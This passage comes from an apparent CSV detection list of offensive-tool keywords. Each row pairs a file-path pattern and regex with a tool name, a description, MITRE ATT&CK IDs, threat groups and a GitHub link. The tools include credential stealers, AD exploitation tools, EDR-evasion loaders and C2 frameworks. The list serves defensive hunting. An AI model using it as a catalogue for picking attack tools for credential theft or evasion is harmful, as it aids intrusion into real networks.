- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/9_DPAPI.py*",".{0,1000}\/9_DPAPI\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/AbandonedCOMKeys/*",".{0,1000}\/AbandonedCOMKeys\/.{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/ABPTTS.git*",".{0,1000}\/ABPTTS\.git.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*/acarsd-info.nse*",".{0,1000}\/acarsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Accomplice.git*",".{0,1000}\/Accomplice\.git.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*/AceLdr.cna*",".{0,1000}\/AceLdr\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*/acheron.git*",".{0,1000}\/acheron\.git.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/acheron.go*",".{0,1000}\/acheron\.go.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/ACLight.git*",".{0,1000}\/ACLight\.git.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*/ACLight/*",".{0,1000}\/ACLight\/.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Information Gathering","https://github.com/cyberark/ACLight","1","1","N/A","N/A","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*/acltoolkit*",".{0,1000}\/acltoolkit.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*/acm_enum_cas_*.json*",".{0,1000}\/acm_enum_cas_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/acm_enum_certs_*.json*",".{0,1000}\/acm_enum_certs_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/acm_enum_certs_chain_*.json*",".{0,1000}\/acm_enum_certs_chain_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/acm_enum_certs_expired_*.json*",".{0,1000}\/acm_enum_certs_expired_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/acm_enum_certs_info_*.json*",".{0,1000}\/acm_enum_certs_info_.{0,1000}\.json.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ActiveScanPlusPlus*",".{0,1000}\/ActiveScanPlusPlus.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","N/A","6","574","182","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" "*/AD_Enumeration_Hunt*",".{0,1000}\/AD_Enumeration_Hunt.{0,1000}","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","AD Enumeration","7","1","92","19","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*/AD_Miner.git*",".{0,1000}\/AD_Miner\.git.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*/ADACLScanner.git*",".{0,1000}\/ADACLScanner\.git.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*/adalanche/modules/*",".{0,1000}\/adalanche\/modules\/.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*/Adamantium-Thief.git*",".{0,1000}\/Adamantium\-Thief\.git.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*/adaudit.git*",".{0,1000}\/adaudit\.git.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*/ADAudit.ps1*",".{0,1000}\/ADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*/ADCollector.exe*",".{0,1000}\/ADCollector\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ADCollector.git*",".{0,1000}\/ADCollector\.git.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*/adconnectdump.git*",".{0,1000}\/adconnectdump\.git.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*/adcs.py*",".{0,1000}\/adcs\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/adcs_enum/*",".{0,1000}\/adcs_enum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*/adcs_request/adcs_request.*",".{0,1000}\/adcs_request\/adcs_request\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/adcs_request/CertCli.*",".{0,1000}\/adcs_request\/CertCli\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/adcs_request/certenroll.*",".{0,1000}\/adcs_request\/certenroll\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/adcs_request/CertPol.*",".{0,1000}\/adcs_request\/CertPol\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/ADCSCoercePotato.git*",".{0,1000}\/ADCSCoercePotato\.git.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*/ADCSCoercePotato/*",".{0,1000}\/ADCSCoercePotato\/.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*/adcs-enum.py*",".{0,1000}\/adcs\-enum\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/adcshunter.git*",".{0,1000}\/adcshunter\.git.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*/ADCSKiller*",".{0,1000}\/ADCSKiller.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","7","680","69","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*/ADCSPwn.exe*",".{0,1000}\/ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ADCSPwn.git*",".{0,1000}\/ADCSPwn\.git.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*/adcsync.git*",".{0,1000}\/adcsync\.git.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*/adcsync.py*",".{0,1000}\/adcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*/add_computer.py*",".{0,1000}\/add_computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/add_groupmember.py*",".{0,1000}\/add_groupmember\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*/addcomputer_LDAP_spn.py*",".{0,1000}\/addcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*/addcomputer_with_spns.py*",".{0,1000}\/addcomputer_with_spns\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*/Add-RemoteRegBackdoor.ps1*",".{0,1000}\/Add\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/address-info.nse*",".{0,1000}\/address\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/AddUser-Bof.*",".{0,1000}\/AddUser\-Bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 